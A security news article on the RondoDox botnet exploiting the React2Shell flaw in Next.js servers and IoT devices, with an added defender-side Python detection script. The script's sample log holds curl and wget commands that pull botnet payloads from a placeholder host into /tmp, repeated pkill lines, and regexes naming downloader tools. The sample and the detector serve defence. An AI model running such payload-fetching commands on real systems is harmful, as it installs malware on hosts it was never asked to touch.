RondoDox Botnet Exploits React2Shell Flaw to Hijack IoT Devices, Web Servers
A persistent cyber campaign has emerged, targeting Internet of Things (IoT) devices and web applications. This campaign has led to the formation of a botnet called RondoDox, which has been active for approximately nine months. Recent analyses by CloudSEK indicate that as of December 2025, the botnet exploits a critical vulnerability known as React2Shell, identified as CVE-2025-55182, with a CVSS score of 10.0.
Understanding the React2Shell Vulnerability
The React2Shell flaw affects React Server Components (RSC) and Next.js frameworks. It allows unauthorized attackers to execute remote code on vulnerable devices. As of late December 2025, around 90,300 systems remain at risk due to this vulnerability, as highlighted by data from the Shadowserver Foundation.
Geographical Impact of Vulnerability
- United States: 68,400 vulnerable instances
- Germany: 4,300 vulnerable instances
- France: 2,800 vulnerable instances
- India: 1,500 vulnerable instances
Evolution of the RondoDox Botnet
RondoDox first appeared in early 2025, expanding its operations by targeting various security vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. Chronicled by cybersecurity firms such as Darktrace, Kaspersky, and VulnCheck, the campaign has followed several distinct phases:
- March – April 2025: Initial reconnaissance and vulnerability scanning.
- April – June 2025: Mass probing of web applications (like WordPress, Drupal, Struts2) and IoT devices (such as Wavlink routers).
- July – December 2025: Automated large-scale deployment of malware.
Recent Attacks and Techniques
In December 2025, threat actors actively scanned for vulnerable Next.js servers. Their activities included deploying various malicious tools:
- Cryptocurrency miners: Labeled as “/nuts/poop.”
- Botnet loader and health checker: Referred to as “/nuts/bolts.”
- Mirai botnet variant: Designated as “/nuts/x86.”
The “/nuts/bolts” component first terminates competing malware, including coin miners, and then loads the primary bot binary from the command-and-control (C2) server. It also repeats this process sweep every 45 seconds so that rival threats are kept off the compromised host.
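As an added, defender-side example (not code from the article, CloudSEK or the botnet itself), the following Python script applies the "monitor for suspicious process executions" recommendation to the behaviour described above: it flags download commands that fetch the named /nuts/ artifacts and any parent process that kills other processes on a roughly 45-second cadence. The event line format, the EXAMPLE-HOST name and the sample events are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Artifact names reported for the RondoDox campaign (from the article).
RONDODOX_ARTIFACTS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")
# Reported cadence of the /nuts/bolts killer loop, with jitter tolerance.
KILL_PERIOD_SEC, TOLERANCE_SEC, MIN_REPEATS = 45, 5, 3
DOWNLOADER_RE = re.compile(r"\b(curl|wget|tftp|ftpget)\b")
KILLER_RE = re.compile(r"\b(kill|pkill|killall)\b")
# Constructed event format: "<ISO timestamp> pid=<n> ppid=<n> cmd=<cmdline>"
EVENT_RE = re.compile(r"^(\S+) pid=(\d+) ppid=(\d+) cmd=(.*)$")

# Constructed sample events; EXAMPLE-HOST is a placeholder, not a real C2.
SAMPLE_EVENTS = """\
2025-12-18T10:00:00 pid=4101 ppid=1 cmd=/usr/bin/node server.js
2025-12-18T10:00:07 pid=4188 ppid=4101 cmd=curl -s http://EXAMPLE-HOST/nuts/bolts -o /tmp/bolts
2025-12-18T10:00:09 pid=4190 ppid=4101 cmd=wget http://EXAMPLE-HOST/nuts/x86 -O /tmp/x86
2025-12-18T10:00:12 pid=4203 ppid=4190 cmd=pkill -9 xmrig
2025-12-18T10:00:57 pid=4230 ppid=4190 cmd=pkill -9 xmrig
2025-12-18T10:01:42 pid=4251 ppid=4190 cmd=pkill -9 xmrig
2025-12-18T10:02:27 pid=4279 ppid=4190 cmd=pkill -9 xmrig
2025-12-18T10:02:30 pid=4300 ppid=1 cmd=/usr/bin/apt-get update
"""

def parse_events(text):
    """Parse event lines into (timestamp, pid, ppid, cmdline) tuples."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group(1)),
                           int(m.group(2)), int(m.group(3)), m.group(4)))
    return events

def detect(events):
    """Return (rule, detail) findings; empty list when nothing is suspicious."""
    findings, kills_by_parent = [], defaultdict(list)
    for ts, pid, ppid, cmd in events:
        # Rule 1: a download utility fetching one of the known artifact names.
        if DOWNLOADER_RE.search(cmd) and any(a in cmd for a in RONDODOX_ARTIFACTS):
            findings.append(("rondodox_artifact_fetch", f"pid={pid} cmd={cmd}"))
        if KILLER_RE.search(cmd):
            kills_by_parent[ppid].append(ts)
    # Rule 2: one parent spawning kill commands at ~KILL_PERIOD_SEC intervals.
    for ppid, stamps in kills_by_parent.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        periodic = sum(1 for g in gaps if abs(g - KILL_PERIOD_SEC) <= TOLERANCE_SEC)
        if periodic + 1 >= MIN_REPEATS:
            findings.append(("periodic_process_killer",
                             f"ppid={ppid} kills={len(stamps)} cadence~{KILL_PERIOD_SEC}s"))
    return findings

if __name__ == "__main__":
    for rule, detail in detect(parse_events(SAMPLE_EVENTS)):
        print(rule, detail)
```

The artifact names alone are a weak signal that an operator can rename at will; the periodic-killer rule is the more durable of the two because it keys on the behaviour the loader needs in order to monopolise the host.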
Mitigation Strategies
To address the risk associated with the RondoDox botnet, organizations should consider the following measures:
- Update Next.js to the latest patched version promptly.
- Segment IoT devices into dedicated VLANs to enhance security.
- Implement Web Application Firewalls (WAFs) to protect web applications.
- Monitor systems for suspicious process executions.
- Block known C2 infrastructure to prevent unauthorized access.
By adopting these strategies, organizations can reduce their vulnerability to the ongoing threats posed by the RondoDox botnet and ensure better protection of their digital environments.